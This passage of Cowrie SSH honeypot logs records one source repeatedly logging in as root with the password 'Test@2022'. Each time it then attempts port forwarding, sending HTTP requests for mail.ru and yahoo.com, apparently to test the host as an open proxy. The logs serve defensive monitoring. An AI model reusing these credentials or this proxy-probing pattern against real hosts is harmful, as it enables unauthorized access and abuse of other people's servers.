56","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:16.795354Z","src_ip":"77.83.207.83","session":"d74c53a1e9ad"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:17.048553Z","src_ip":"77.83.207.83","session":"d74c53a1e9ad"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":29594,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:29594","sensor":"my-vps","timestamp":"2025-08-31T03:45:17.100290Z","session":"d74c53a1e9ad"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:17.151325Z","src_ip":"77.83.207.83","session":"d74c53a1e9ad"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":8372,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:8372","sensor":"my-vps","timestamp":"2025-08-31T03:45:17.297148Z","session":"d74c53a1e9ad"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:17.348013Z","src_ip":"77.83.207.83","session":"d74c53a1e9ad"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":27701,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:27701","sensor":"my-vps","timestamp":"2025-08-31T03:45:17.493081Z","session":"d74c53a1e9ad"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:17.543908Z","src_ip":"77.83.207.83","session":"d74c53a1e9ad"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:17.595790Z","src_ip":"77.83.207.83","session":"d74c53a1e9ad"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":47978,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9df1d9f82ab","protocol":"ssh","message":"New connection: 77.83.207.83:47978 (1.2.3.4:22) [session: b9df1d9f82ab]","sensor":"my-vps","timestamp":"2025-08-31T03:45:17.648200Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:17.649287Z","src_ip":"77.83.207.83","session":"b9df1d9f82ab"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:17.702724Z","src_ip":"77.83.207.83","session":"b9df1d9f82ab"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:17.969116Z","src_ip":"77.83.207.83","session":"b9df1d9f82ab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":24181,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:24181","sensor":"my-vps","timestamp":"2025-08-31T03:45:18.023502Z","session":"b9df1d9f82ab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:18.077147Z","src_ip":"77.83.207.83","session":"b9df1d9f82ab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":12280,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:12280","sensor":"my-vps","timestamp":"2025-08-31T03:45:18.227824Z","session":"b9df1d9f82ab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:18.281297Z","src_ip":"77.83.207.83","session":"b9df1d9f82ab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":21829,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:21829","sensor":"my-vps","timestamp":"2025-08-31T03:45:18.431738Z","session":"b9df1d9f82ab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:18.485259Z","src_ip":"77.83.207.83","session":"b9df1d9f82ab"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:18.539734Z","src_ip":"77.83.207.83","session":"b9df1d9f82ab"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":48086,"dst_ip":"1.2.3.4","dst_port":22,"session":"e156388aca5d","protocol":"ssh","message":"New connection: 77.83.207.83:48086 (1.2.3.4:22) [session: e156388aca5d]","sensor":"my-vps","timestamp":"2025-08-31T03:45:18.589099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:18.590249Z","src_ip":"77.83.207.83","session":"e156388aca5d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:18.640529Z","src_ip":"77.83.207.83","session":"e156388aca5d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:18.890901Z","src_ip":"77.83.207.83","session":"e156388aca5d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":16044,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:16044","sensor":"my-vps","timestamp":"2025-08-31T03:45:18.942217Z","session":"e156388aca5d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:18.992604Z","src_ip":"77.83.207.83","session":"e156388aca5d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":4931,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:4931","sensor":"my-vps","timestamp":"2025-08-31T03:45:19.136661Z","session":"e156388aca5d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:19.186870Z","src_ip":"77.83.207.83","session":"e156388aca5d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":10382,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:10382","sensor":"my-vps","timestamp":"2025-08-31T03:45:19.328706Z","session":"e156388aca5d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:19.379030Z","src_ip":"77.83.207.83","session":"e156388aca5d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:19.430302Z","src_ip":"77.83.207.83","session":"e156388aca5d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":48180,"dst_ip":"1.2.3.4","dst_port":22,"session":"7951424c2d4f","protocol":"ssh","message":"New connection: 77.83.207.83:48180 (1.2.3.4:22) [session: 7951424c2d4f]","sensor":"my-vps","timestamp":"2025-08-31T03:45:19.479491Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:19.480392Z","src_ip":"77.83.207.83","session":"7951424c2d4f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:19.530765Z","src_ip":"77.83.207.83","session":"7951424c2d4f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:19.781134Z","src_ip":"77.83.207.83","session":"7951424c2d4f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":17592,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:17592","sensor":"my-vps","timestamp":"2025-08-31T03:45:19.832252Z","session":"7951424c2d4f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:19.882610Z","src_ip":"77.83.207.83","session":"7951424c2d4f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":26438,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:26438","sensor":"my-vps","timestamp":"2025-08-31T03:45:20.024600Z","session":"7951424c2d4f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:20.074986Z","src_ip":"77.83.207.83","session":"7951424c2d4f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":29863,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:29863","sensor":"my-vps","timestamp":"2025-08-31T03:45:20.216668Z","session":"7951424c2d4f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:20.266902Z","src_ip":"77.83.207.83","session":"7951424c2d4f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:20.317999Z","src_ip":"77.83.207.83","session":"7951424c2d4f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":48281,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1be5fea420e","protocol":"ssh","message":"New connection: 77.83.207.83:48281 (1.2.3.4:22) [session: c1be5fea420e]","sensor":"my-vps","timestamp":"2025-08-31T03:45:20.367159Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:20.367854Z","src_ip":"77.83.207.83","session":"c1be5fea420e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:20.418735Z","src_ip":"77.83.207.83","session":"c1be5fea420e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:20.670011Z","src_ip":"77.83.207.83","session":"c1be5fea420e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":17176,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:17176","sensor":"my-vps","timestamp":"2025-08-31T03:45:20.721454Z","session":"c1be5fea420e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:20.772014Z","src_ip":"77.83.207.83","session":"c1be5fea420e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":15270,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:15270","sensor":"my-vps","timestamp":"2025-08-31T03:45:20.912791Z","session":"c1be5fea420e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:20.963245Z","src_ip":"77.83.207.83","session":"c1be5fea420e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":6238,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:6238","sensor":"my-vps","timestamp":"2025-08-31T03:45:21.104803Z","session":"c1be5fea420e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:21.155340Z","src_ip":"77.83.207.83","session":"c1be5fea420e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:21.206438Z","src_ip":"77.83.207.83","session":"c1be5fea420e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":48379,"dst_ip":"1.2.3.4","dst_port":22,"session":"ddcc0ada529b","protocol":"ssh","message":"New connection: 77.83.207.83:48379 (1.2.3.4:22) [session: ddcc0ada529b]","sensor":"my-vps","timestamp":"2025-08-31T03:45:21.255008Z"}
